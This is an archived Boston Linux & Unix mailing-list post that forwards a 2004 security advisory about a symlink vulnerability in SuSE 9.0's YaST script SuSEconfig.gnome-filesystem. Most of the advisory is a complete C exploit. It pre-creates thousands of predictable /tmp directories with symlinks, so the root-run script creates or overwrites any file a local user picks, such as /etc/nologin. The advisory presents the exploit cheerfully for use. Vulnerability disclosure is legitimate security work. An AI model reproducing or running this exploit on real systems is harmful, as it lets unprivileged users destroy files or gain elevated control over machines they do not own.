Boston Linux & Unix (BLU) Home | Calendar | Mail Lists | List Archives | Desktop SIG | Hardware Hacking SIG
Wiki | Flickr | PicasaWeb | Video | Maps & Directions | Installfests | Keysignings
Linux Cafe | Meeting Notes | Blog | Linux Links | Bling | About BLU

BLU Discuss list archive


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

hi, don't know how vulnerable this may make somebody, but since some of
you guys are into suse thought i would pass it along.  -eric.

~ Author: l0om <l0om at excluded.org>
~ Date: 12.01.2004
~ page: www.excluded.org

~ SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem

~ There is a symlink problem in the
SuSEconfig.gnome-filesystem
~ scribt. a normal user can creat and overwrite every
file
~ on the system. This script gets executed after a
configuration change by the
setup tool YaST. So if you have installed gnome or
parts of gnome check this out.


~ When this scribt gets executed by YaST after a
~ configuration change it does the following:

~ TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
~ mkdir $TEMP
~ touch $TEMP/list
~ [...]
~ echo >$TEMP/found
~ [...]

~ the env variable $RANDOM includes a random number.
in my tests
~ this number goes up from 1 to 33000. But also if it
goes up to
~ 65535 it is still vul. to a symlink attack. this is
nearly as
~ bad as the symlink problem which has been found on
SuSE 8.2.
~ On 8.2 a SuSEconf scribt has created a link with the
$$ at the
~ file end.

~ I have used a little exploit written in C which
creats the
~ directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
up to
~ 33000. in every directory i have created a symlink
to a file
~ which i want to creat or to overwrite. as the
filename i have
~ taken the $TEMP/found and let it point to some file.
in my test i
~ have taken the /etc/nologin- and hey- it has worked!

~ have phun!


*******************************************************************/

~ #include <stdio.h>
~ #include <unistd.h>
~ #include <string.h>

~ #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
~ #define START 1
~ #define END 33000

~ int main(int argc, char **argv)
~ {
~ int i;
~ char buf[150];

~ printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
~ printf("\t-------------------------------------------------------------
\n");
~ printf("\tdiscovered and written by l0om
<l0om at excluded.org>\n");
~ printf("\t WWW.EXCLUDED.ORG\n\n");

~ if(argc != 2) {
~ printf("usage: %s <destination-file>\n",argv[0]);
~ exit(0xff);
~ }

~ printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
~ read(1, buf, 1); fflush(stdin);

~ umask(0000);
~ printf("working\n\n");
~ for(i = START; i < END; i++) {
~ snprintf(buf, sizeof(buf),"%s%d",PATH,i);
~ if(mkdir(buf,00777) == -1) {
~ fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
~ exit(0xff);
~ }
~ if(!(i%1000))printf(".");
~ strcat(buf, "/found");
~ if(symlink(argv[1], buf) == -1) {
~ fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
~ exit(0xff);
~ }
~ }
~ printf("\ndone!\n");
~ printf("next time the SuSE.gnome-filesystem script
gets executed\n");
~ printf("we will create or overwrite file %s
\n",argv[1]);
~ return(0x00);
~ }  /* i cant wait for the new gobbles comic!! */

- --
Please avoid sending me Word or PowerPoint attachments.
Plain text or OpenOffice.org attachments only.  Thanks.
See http://www.fsf.org/philosophy/no-word-attachments.html
SHAMELESS SELF PROMOTION at http://home.comcast.net/~235u/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFABJM9LlZzXRl+JnERArwrAKDuVnDFvR6qT/byIEIEl99x2bz0QQCgw6dM
QFWEE8VC5InGdDRUjhDUDfk=
=EKUw
-----END PGP SIGNATURE-----





BLU is a member of BostonUserGroups
BLU is a member of BostonUserGroups
We also thank MIT for the use of their facilities.

Valid HTML 4.01! Valid CSS!



Boston Linux & Unix / webmaster@blu.org